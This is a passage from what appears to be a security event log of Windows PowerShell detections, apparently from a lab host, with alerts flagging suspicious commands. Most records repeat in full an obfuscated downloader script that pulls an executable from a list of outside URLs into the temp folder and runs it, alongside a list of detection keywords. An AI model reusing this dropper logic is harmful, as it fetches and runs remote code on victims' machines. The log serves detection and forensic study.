.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 789 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=27 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item" ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 787 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=23 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 792 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=33 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item" ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 786 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 